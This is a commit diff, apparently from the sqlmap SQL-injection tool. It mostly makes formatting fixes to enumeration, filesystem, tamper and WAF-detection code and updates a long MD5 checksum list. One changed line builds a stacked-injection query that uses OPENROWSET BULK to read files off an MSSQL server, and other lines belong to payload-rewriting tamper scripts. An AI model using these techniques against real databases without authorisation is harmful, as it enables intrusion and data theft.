query = rootQuery.blind.query2 % (conf.db, conf.db, conf.db, conf.db, column, conf.db,
conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl).split(".")[-1])
query = rootQuery.blind.query2 % (conf.db, conf.db, conf.db, conf.db, column, conf.db, conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl).split(".")[-1])
elif Backend.isDbms(DBMS.FIREBIRD):
query = rootQuery.blind.query2 % (unsafeSQLIdentificatorNaming(tbl), column)
elif Backend.isDbms(DBMS.INFORMIX):
@ -823,10 +821,7 @@ class Databases:
self.getTables()
infoMsg = "fetched tables: "
infoMsg += ", ".join(["%s" % ", ".join("%s%s%s" % (unsafeSQLIdentificatorNaming(db), ".." if \
Backend.isDbms(DBMS.MSSQL) or Backend.isDbms(DBMS.SYBASE) \
else ".", unsafeSQLIdentificatorNaming(t)) for t in tbl) for db, tbl in \
kb.data.cachedTables.items()])
infoMsg += ", ".join(["%s" % ", ".join("%s%s%s" % (unsafeSQLIdentificatorNaming(db), ".." if Backend.isDbms(DBMS.MSSQL) or Backend.isDbms(DBMS.SYBASE) else '.', unsafeSQLIdentificatorNaming(_)) for _ in tbl) for db, tbl in kb.data.cachedTables.items()])
logger.info(infoMsg)
for db, tables in kb.data.cachedTables.items():

2
plugins/generic/entries.py
View File

@ -470,7 +470,7 @@ class Entries:
if kb.data.cachedTables:
if isinstance(kb.data.cachedTables, list):
kb.data.cachedTables = { None: kb.data.cachedTables }
kb.data.cachedTables = {None: kb.data.cachedTables}
for db, tables in kb.data.cachedTables.items():
conf.db = db

2
plugins/generic/filesystem.py
View File

@ -49,7 +49,7 @@ class Filesystem:
elif Backend.isDbms(DBMS.MSSQL):
self.createSupportTbl(self.fileTblName, self.tblField, "VARBINARY(MAX)")
inject.goStacked("INSERT INTO %s(%s) SELECT %s FROM OPENROWSET(BULK '%s', SINGLE_BLOB) AS %s(%s)" % (self.fileTblName, self.tblField, self.tblField, remoteFile, self.fileTblName, self.tblField));
inject.goStacked("INSERT INTO %s(%s) SELECT %s FROM OPENROWSET(BULK '%s', SINGLE_BLOB) AS %s(%s)" % (self.fileTblName, self.tblField, self.tblField, remoteFile, self.fileTblName, self.tblField))
lengthQuery = "SELECT DATALENGTH(%s) FROM %s" % (self.tblField, self.fileTblName)

1
tamper/between.py
View File

@ -55,5 +55,4 @@ def tamper(payload, **kwargs):
_ = "%s %s BETWEEN %s AND %s" % (match.group(2), match.group(4), match.group(5), match.group(5))
retVal = retVal.replace(match.group(0), _)
return retVal

2
tamper/ifnull2casewhenisnull.py
View File

@ -61,5 +61,3 @@ def tamper(payload, **kwargs):
break
return payload

130
txt/checksum.md5
View File

@ -21,35 +21,35 @@ c88d66597f4aab719bde4542b0a1a6e0 extra/shutils/regressiontest.py
1e5532ede194ac9c083891c2f02bca93 extra/sqlharvest/__init__.py
b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py
0f581182871148b0456a691ae85b04c0 lib/controller/action.py
e8533a8a406fe58cc610337639ed4bb1 lib/controller/checks.py
9fbd66da9b5cf58bbb8474ccf9252bb7 lib/controller/controller.py
a7b0c8e5a18a3abe8803999dcfc4664f lib/controller/handler.py
62a348c0ed32c7e67cd456680791cad5 lib/controller/checks.py
a66044daa98684fde830324c54da98ee lib/controller/controller.py
c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py
1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py
052c368ae6ca09362a19376c8483fa85 lib/core/agent.py
591c66fa439a48b7d8b5b581437cd14d lib/core/bigarray.py
b1990c7805943f0c973a853bba981d96 lib/core/agent.py
fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py
33c03aad7f4c6e7241b6f204560e69ca lib/core/common.py
2910524e4478be6b5893fb9d851a62ec lib/core/convert.py
1c4c4bf8eacc911378a2e4b2f9f03184 lib/core/convert.py
9f87391b6a3395f7f50830b391264f27 lib/core/data.py
72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py
12e80071013606f01822c3823fb51054 lib/core/decorators.py
9458679feb9184f3fb1611daf1ebef63 lib/core/defaults.py
a8bea09096a42a9a7feeb9d4d118ae66 lib/core/dicts.py
fbb55cc6100318ff922957b6577dc58f lib/core/defaults.py
da98f5288aad57855c6d287ba3b397a1 lib/core/dicts.py
9ea8a043030796e6faef7f7e957729d5 lib/core/dump.py
c8551f7696a76450e6d139409e4f06cd lib/core/enums.py
bfffdc74a93ff647c49b79c215d96d8a lib/core/enums.py
cada93357a7321655927fc9625b3bfec lib/core/exception.py
1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py
458a194764805cd8312c14ecd4be4d1e lib/core/log.py
63ac6631d75e4f7c20b946a0c06bad33 lib/core/optiondict.py
8a9346b975931d8d995354692ab68f82 lib/core/option.py
7dadbb9a301d40cc8cd9c7491e99b43d lib/core/profiling.py
c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py
911ec851f2cad046036ddaf776c8559f lib/core/option.py
7cfd04e583cca782b843f6f6d973981a lib/core/profiling.py
ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py
0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py
a7db43859b61569b601b97f187dd31c5 lib/core/revision.py
fcb74fcc9577523524659ec49e2e964b lib/core/session.py
053e81e44a3df054a3ffd39d58de7079 lib/core/settings.py
d0adc28a38e43a787df4471f7f027413 lib/core/shell.py
63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py
3cc852f927833895361973fbcfd156d2 lib/core/target.py
36989c9805e448024fc49aabde49a69e lib/core/settings.py
0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py
a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py
12f8c42ed742581644f6476a7d80dcf8 lib/core/target.py
72d499ca8d792e90a1ebfb2ad2341a51 lib/core/testing.py
de9922a29c71a235cb95a916ff925db2 lib/core/threads.py
c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py
@ -57,122 +57,122 @@ c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py
e772deb63270375e685fa5a7b775c382 lib/core/wordlist.py
1e5532ede194ac9c083891c2f02bca93 lib/__init__.py
7620f1f4b8791e13c7184c06b5421754 lib/parse/banner.py
d505c725f5d6887ec80b5b94ca1dc9f5 lib/parse/cmdline.py
f667710f17b8447358ee7508a9d2faf1 lib/parse/cmdline.py
fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py
3794ff139869f5ae8e81cfdbe5714f56 lib/parse/handler.py
263ee1cec41facd2a06d0dc887b207ad lib/parse/headers.py
8d7321a1bc1a26ac55b2398bf445d78f lib/parse/headers.py
33f21b11b7963062df8fa2292229df80 lib/parse/html.py
1e5532ede194ac9c083891c2f02bca93 lib/parse/__init__.py
ec4e56bbb1349176b2a22e0b99ba6a55 lib/parse/payloads.py
492654567e72b6a14584651fcd9f16e6 lib/parse/sitemap.py
30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py
eb39d5cbd69a2238e2f4ea2fde183cdb lib/request/basic.py
53c38db67dd4b14fbceee71e4748f874 lib/request/basic.py
c0cabedead14b8a23353b606672cff42 lib/request/comparison.py
94c0ce8d2a2d9001a416420f61b67ee7 lib/request/connect.py
b91eaa32c602182c4f6e2f7d6de61267 lib/request/connect.py
dd4598675027fae99f2e2475b05986da lib/request/direct.py
2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py
a1436e4e4f9b636cb8332f00b686bfd5 lib/request/httpshandler.py
eee965d781546d05f36cfd14af050913 lib/request/httpshandler.py
1e5532ede194ac9c083891c2f02bca93 lib/request/__init__.py
bee0a8bec4968406e93281d2b8ad62c8 lib/request/inject.py
cb05d965aa3d5871d14b5e45fe9128b4 lib/request/inject.py
aaf956c1e9855836c3f372e29d481393 lib/request/methodrequest.py
51eeaa8abf5ba62aaaade66d46ff8b00 lib/request/pkihandler.py
aa7cb67139bbc57d67a728fd2abf80ed lib/request/rangehandler.py
aa809d825b33bea76a63ecd97cf7792c lib/request/redirecthandler.py
bbfe91128ab3ad65343ed449936a890b lib/request/templates.py
edfd88ee82c2b2a0a762dad1f4eb5253 lib/takeover/abstraction.py
7f12d8f3b6665ed7053954bba70ff718 lib/request/templates.py
8d31425f36a7a9c093eb9bef44589593 lib/takeover/abstraction.py
acc1db3667bf910b809eb279b60595eb lib/takeover/icmpsh.py
1e5532ede194ac9c083891c2f02bca93 lib/takeover/__init__.py
703e15714316a8cc4bbe54cdd0a8cb87 lib/takeover/metasploit.py
0fc9b00596df21c8878ef92f513ecad7 lib/takeover/registry.py
b1a6689e92e6ce998337bd41d8b09d6e lib/takeover/metasploit.py
fb9e34d558293b5d6b9727f440712886 lib/takeover/registry.py
48575dde7bb867b7937769f569a98309 lib/takeover/udf.py
746f400dfa6dc1139f14c44574d6b948 lib/takeover/web.py
d8c10f278e5943b137a222f4cedca59d lib/takeover/xp_cmdshell.py
b84d45fc7349caa714f9769b13d70cab lib/techniques/blind/inference.py
4584ac6ee5c13d4d395f0a7a21d8478c lib/takeover/web.py
79d1ba3ab7b2552c5f09992ce08e765d lib/takeover/xp_cmdshell.py
2543e14cc7f6e239b49dd40f41bc34fa lib/techniques/blind/inference.py
1e5532ede194ac9c083891c2f02bca93 lib/techniques/blind/__init__.py
1e5532ede194ac9c083891c2f02bca93 lib/techniques/dns/__init__.py
855355a1a216f6b267a5f089028f1cd8 lib/techniques/dns/test.py
733f3419ff2ea23f75bc24e36f4746d9 lib/techniques/dns/use.py
1e5532ede194ac9c083891c2f02bca93 lib/techniques/error/__init__.py
627ddc86a5a969e5509c7531c5c27a6c lib/techniques/error/use.py
f999f2e88dea9ac8831eb2f468478b5f lib/techniques/error/use.py
1e5532ede194ac9c083891c2f02bca93 lib/techniques/__init__.py
1e5532ede194ac9c083891c2f02bca93 lib/techniques/union/__init__.py
da5a117fb64723e6c815b0e33d50f66a lib/techniques/union/test.py
ac67ebbabd06bf9853befc65ad49679e lib/techniques/union/use.py
609ba6e5039de4814115b966cd72645a lib/utils/api.py
11ecf2effbe9f40b361843d546c3c521 lib/techniques/union/use.py
c552f8d924d962a26f2ded250bcea3b8 lib/utils/api.py
37dfb641358669f62c2acedff241348b lib/utils/brute.py
a34c4fd2e7d78c5dfdd9eeccb079fb1c lib/utils/crawler.py
69c25da85a3a71a9798804075cdfd62b lib/utils/deps.py
a6d6888e14a7c11f0884c8cc18489caa lib/utils/getch.py
31b1e7eb489eac837db6a2bc1dcb7da7 lib/utils/crawler.py
de9620f03231d8329ee8434884b6bacd lib/utils/deps.py
635ed692ab141d428d0957b71b25c1aa lib/utils/getch.py
7af29f61302c8693cd6436d4b69e22d3 lib/utils/har.py
062e4e8fc43ac54305a75ddd0d482f81 lib/utils/hashdb.py
55c552e754b54cd25a47efb84d3e6892 lib/utils/hash.py
145120b21fcfca843d5e2c8b0562e4db lib/utils/htmlentities.py
cc1cfe36057f1d9bbdcba1bcc03359f9 lib/utils/hash.py
011d2dbf589e0faa0deca61a651239cc lib/utils/htmlentities.py
1e5532ede194ac9c083891c2f02bca93 lib/utils/__init__.py
010d8327239d33af4ce9f25683cfc012 lib/utils/pivotdumptable.py
5d6d73d27833eef1b10b9215629533ff lib/utils/progress.py
5cb78b0e60fd7fd84502d62cf85d2064 lib/utils/progress.py
0ec5cec9d93d5ffd1eaeda6e942ecadf lib/utils/purge.py
4a6886d3a0c7bf768df97738fa257de9 lib/utils/search.py
236a8d9e596602b53f8e0aa09c30c0ef lib/utils/sqlalchemy.py
dcc25183c6bd85b172c87cfcbc305ab6 lib/utils/timeout.py
ce5ec6300bc0a185827a21d8a8f09de3 lib/utils/versioncheck.py
1e9cf437451ff8147a372a002641b963 lib/utils/xrange.py
3d230e342a6c8d60ac7c68c556fbba9b lib/utils/versioncheck.py
7348ee704485651737ddbe3538271be9 lib/utils/xrange.py
b9d2761f47fec3d98b88311a263fd5db plugins/dbms/access/connector.py
3f1c50a1507d1c2f69c20c706230e2e2 plugins/dbms/access/enumeration.py
fcc66fc377db3681f7890ec55675564b plugins/dbms/access/filesystem.py
47a9c7a39ad179b73a9d6f0e1f269f74 plugins/dbms/access/fingerprint.py
c2428c5c73d049abf4442ec1b9404a25 plugins/dbms/access/fingerprint.py
e657b1b7a295a38ac9ce515158164f00 plugins/dbms/access/__init__.py
77686d7c7e287d5db0a9a87f2c7d4902 plugins/dbms/access/syntax.py
2f1d8706b51497623b2b59c07b552bdc plugins/dbms/access/takeover.py
0cf941076f4685ec8ac63f57b31a46a6 plugins/dbms/db2/connector.py
ead470b613e52e718a3062b63b518272 plugins/dbms/db2/connector.py
0884e475c98701f8e698150aa122fb76 plugins/dbms/db2/enumeration.py
da9dccd1f9ec2cf1e53295125dd983a0 plugins/dbms/db2/filesystem.py
a660e74854f3c70606f1cc3bc450fbcc plugins/dbms/db2/fingerprint.py
ba492b2aaa6432b5548c5a8fa5eec435 plugins/dbms/db2/fingerprint.py
95b35cbd859bbced44e7f8fd84486d75 plugins/dbms/db2/__init__.py
82d96d8fcfd565129580260040555623 plugins/dbms/db2/syntax.py
25f0fb28e9defcab48a2e946fbb7550a plugins/dbms/db2/takeover.py
4a941e7f39dc098ee489eeacc720a8cc plugins/dbms/firebird/connector.py
53bd7de27d37958f543f5329362ac298 plugins/dbms/firebird/connector.py
bc4d71116d7296d63894484f2e60ade2 plugins/dbms/firebird/enumeration.py
c3ca81000200e5ab4210e9bf2e04ce93 plugins/dbms/firebird/filesystem.py
94a86678fd2bf6bff6c3439934f59277 plugins/dbms/firebird/fingerprint.py
bd2159afbe83c70059f57712b4ae0189 plugins/dbms/firebird/fingerprint.py
d4ea3036492b8ae15340548b2936021f plugins/dbms/firebird/__init__.py
c56f2dabe88fd761a1a9a51e4d104088 plugins/dbms/firebird/syntax.py
1522a29bd4b54ea78bb2855fc32b6c72 plugins/dbms/firebird/takeover.py
61225f674e64bc6eafea140c4cf93deb plugins/dbms/hsqldb/connector.py
271a7f16e781d56a0a31a3d5515a1945 plugins/dbms/hsqldb/connector.py
95919592e5bb83df00b99bb9e8a70977 plugins/dbms/hsqldb/enumeration.py
616595e74ecb644271cbbd31815d92e0 plugins/dbms/hsqldb/filesystem.py
b7d693a6f5f39fee0a65f2d7b0830c5e plugins/dbms/hsqldb/fingerprint.py
fd369161778d6b48d7f1f7fc14dcdb5c plugins/dbms/hsqldb/__init__.py
4673ebfdce9859718c19e8a7765da8d3 plugins/dbms/hsqldb/syntax.py
7c0535736215ca612756cf589adb249b plugins/dbms/hsqldb/takeover.py
5fca2136204e0ea432cc7a2572244a20 plugins/dbms/informix/connector.py
9ceb9430031a26ecebe13ea49cb2a5fa plugins/dbms/informix/connector.py
c54d70e4847c6327bd3110c4d8723b04 plugins/dbms/informix/enumeration.py
da9dccd1f9ec2cf1e53295125dd983a0 plugins/dbms/informix/filesystem.py
35eac2f3837a72940eb50753dc4566e5 plugins/dbms/informix/fingerprint.py
9dac94c8f76acf0be65b6c57ecdb5c34 plugins/dbms/informix/__init__.py
39dc5c088b4d37742290acc76c47fe94 plugins/dbms/informix/syntax.py
aa77fec4fe6b2d7ca4a91aebd9ff4e21 plugins/dbms/informix/syntax.py
25f0fb28e9defcab48a2e946fbb7550a plugins/dbms/informix/takeover.py
1e5532ede194ac9c083891c2f02bca93 plugins/dbms/__init__.py
6917f9b045f6188b89e816dea9b46a3f plugins/dbms/maxdb/connector.py
615be11d750530211af244b6ca6aef14 plugins/dbms/maxdb/enumeration.py
f33efaab1695dc9885ebae3f6072fffa plugins/dbms/maxdb/enumeration.py
ffd26f64142226d0b1ed1d70f7f294c0 plugins/dbms/maxdb/filesystem.py
9f9f1c4c4c3150545c4b61d1cffc76a8 plugins/dbms/maxdb/fingerprint.py
4321d7018f5121343460ebfd83bb69be plugins/dbms/maxdb/__init__.py
e7d44671ae26c0bcd5fe8448be070bbd plugins/dbms/maxdb/syntax.py
bf7842bb291e2297c3c8d1023eb3e550 plugins/dbms/maxdb/takeover.py
6439d15c1e8cdb069056c4fa725326df plugins/dbms/mssqlserver/connector.py
a833fbc30ab1133bc6ba293d97d0ef7c plugins/dbms/mssqlserver/enumeration.py
7e495d786fa8e1da96e73e2905bbd7dd plugins/dbms/mssqlserver/filesystem.py
03d463c15ebbfa4e49155b261b59db31 plugins/dbms/mssqlserver/fingerprint.py
f1f1541a54faf67440179fa521f99849 plugins/dbms/mssqlserver/enumeration.py
177e1d55d28ed3190bc0079b8126c6be plugins/dbms/mssqlserver/filesystem.py
51eb413ac62408965be20a812f2412c8 plugins/dbms/mssqlserver/fingerprint.py
affef90b1442285da7e89e46603c502e plugins/dbms/mssqlserver/__init__.py
612be1929108e7b4512a49a4a3837bbc plugins/dbms/mssqlserver/syntax.py
b9e62a80bd3ead133a511f9769e5e6c3 plugins/dbms/mssqlserver/takeover.py
08fe8ac7acdfc0e3168b5b069a7c73bf plugins/dbms/mssqlserver/takeover.py
f6e1f3f09f32b9cb2ca11c016d373423 plugins/dbms/mysql/connector.py
445164daf59b890aeacc968af58fcb53 plugins/dbms/mysql/enumeration.py
f36e09edc3eafedd989fbe44ec048e71 plugins/dbms/mysql/filesystem.py
2bfd2369aebe2999f7333cca0895507c plugins/dbms/mysql/fingerprint.py
88b876f085fec2569a0697f4b69f41da plugins/dbms/mysql/__init__.py
fcbf7ff279c527b4aca0dac94c28d20c plugins/dbms/mysql/fingerprint.py
30065993f8300994e4658634121609e9 plugins/dbms/mysql/__init__.py
0e2adbee217f5b94dcc124d24b8dde99 plugins/dbms/mysql/syntax.py
f30009816db6a0b41342301f0d657a01 plugins/dbms/mysql/takeover.py
403591e638b6bfdb840d52bd3138ee56 plugins/dbms/mysql/takeover.py
999cb8d0d52820d30bdd4b3d658a765d plugins/dbms/oracle/connector.py
e1ffee36fd18f33f34bb4bac4ae43f14 plugins/dbms/oracle/enumeration.py
c326b0d8bed92be67888b0242f565ac8 plugins/dbms/oracle/filesystem.py
@ -184,8 +184,8 @@ f99c23db4ee6a6b8c0edbf684d360ad3 plugins/dbms/postgresql/connector.py
7cdb821884e5f15084d1bea7f8a50574 plugins/dbms/postgresql/enumeration.py
c8bb829d45752b98e6a03817b92e0fe5 plugins/dbms/postgresql/filesystem.py
603d533d924498378eccba4f0f196be6 plugins/dbms/postgresql/fingerprint.py
4fe6dcf2b43b6dac46f31d75e9de260d plugins/dbms/postgresql/__init__.py
c8c2d660977e3e07182e7cdf31aa786a plugins/dbms/postgresql/syntax.py
470860d3e85d11a67f2220bffaa415e7 plugins/dbms/postgresql/__init__.py
20e6f48f496348be45f3402ebc265dbb plugins/dbms/postgresql/syntax.py
1287acf330da86a93c8e64aff46e3b65 plugins/dbms/postgresql/takeover.py
3009438ba259ca159c5ce9799f27dec1 plugins/dbms/sqlite/connector.py
5194556e6b1575b1349f8ccfd773952b plugins/dbms/sqlite/enumeration.py
@ -195,7 +195,7 @@ f639120d42b33b6ca67930bddbf2ac1f plugins/dbms/sqlite/__init__.py
964e59d2eba619b068b0a15cea28efe0 plugins/dbms/sqlite/syntax.py
3364b2938d7040c507cd622c323557dc plugins/dbms/sqlite/takeover.py
6439d15c1e8cdb069056c4fa725326df plugins/dbms/sybase/connector.py
31462dc5a1cd2a1b4eba6762d18fb48c plugins/dbms/sybase/enumeration.py
426698152f63504061e5875e64957691 plugins/dbms/sybase/enumeration.py
74de450dd6d6d006aa9c7eed56e6b09a plugins/dbms/sybase/filesystem.py
c8ee0deaa2309e96d9a409ff1524f3ad plugins/dbms/sybase/fingerprint.py
a3db8618eed5bb2807b6f77605cba9cc plugins/dbms/sybase/__init__.py
@ -203,10 +203,10 @@ a3db8618eed5bb2807b6f77605cba9cc plugins/dbms/sybase/__init__.py
79f6c7017db4ded8f74a0117188836ff plugins/dbms/sybase/takeover.py
34d181a7086d6dfc7e72ae5f8a4cfe0f plugins/generic/connector.py
e6cd1c5a5244d83396b401f7db43d323 plugins/generic/custom.py
554f925e0a66f62b8ba39dd6c95d1e7f plugins/generic/databases.py
764a8fd5a99224910885c6b94a592170 plugins/generic/entries.py
dc07665887191ac977e5377f5a66d288 plugins/generic/databases.py
1db2e179c19e8a38e0ef5075363eb32f plugins/generic/entries.py
d82f2c78c1d4d7c6487e94fd3a68a908 plugins/generic/enumeration.py
ea0f3b9085061b272bfd98c13ad2d977 plugins/generic/filesystem.py
0c8abe66a78edca0660bfb8049d109e2 plugins/generic/filesystem.py
f5d5419efddfe04648ea5e953c650793 plugins/generic/fingerprint.py
1e5532ede194ac9c083891c2f02bca93 plugins/generic/__init__.py
f7874230e5661910d5fd21544c7d1022 plugins/generic/misc.py
@ -229,7 +229,7 @@ ec2ba8c757ac96425dcd2b97970edd3a shell/stagers/stager.asp_
4115a55b8aba464723d645b7d3156b6e tamper/apostrophenullencode.py
d7e9a979eff4d7315d804a181e66fc93 tamper/appendnullbyte.py
0298d81e9dfac7ff18a5236c0f1d84b6 tamper/base64encode.py
55e9fbe57967e57a05a8ca77c312dc70 tamper/between.py
4d44f868c6c97ced29e306347ce5d650 tamper/between.py
e1d2329adc6ca89828a2eaec2951806c tamper/bluecoat.py
e3cdf13caedb4682bee3ff8fac103606 tamper/chardoubleencode.py
3b2f68476fbcf8223199e8dd4ec14b64 tamper/charencode.py
@ -244,7 +244,7 @@ dcdc433fe946f1b9005bcd427a951dd6 tamper/equaltolike.py
4393cc5220d2e39c5c9c5a9af4e2635d tamper/greatest.py
25ec62158d3e289bda8a04c8b65686ba tamper/halfversionedmorekeywords.py
9d8c350cbb90d4b21ec9c9db184a213a tamper/htmlencode.py
838212f289632526777b7224bf8aacf9 tamper/ifnull2casewhenisnull.py
3f79551baf811ff70b2ba8795a2064be tamper/ifnull2casewhenisnull.py
e2c2b6a67546b36983a72f129a817ec0 tamper/ifnull2ifisnull.py
91c92ee203e7e619cb547643883924ca tamper/informationschemacomment.py
1e5532ede194ac9c083891c2f02bca93 tamper/__init__.py
@ -427,7 +427,7 @@ ad7fe23004f8e0d02534c7baa877add3 waf/paloalto.py
166eb53544536e3e86223d513b8b688d waf/proventia.py
78a40eca7ddd14c4eaf911de7748b487 waf/radware.py
f5d53758d2008195609557112ce8e895 waf/requestvalidationmode.py
022956799ff08db1a39fe1484d949e54 waf/safe3.py
acb82b21f4032ceb510a58142add02ab waf/safe3.py
67cdf508e7b1f69ddf622a87e0e5e4e8 waf/safedog.py
d1b67820442199181815ec3fce27e582 waf/secureiis.py
34f0ec775835744bed601ef7c7a21c9d waf/senginx.py

1
waf/safe3.py
View File

@ -23,4 +23,3 @@ def detect(get_page):
break
return retval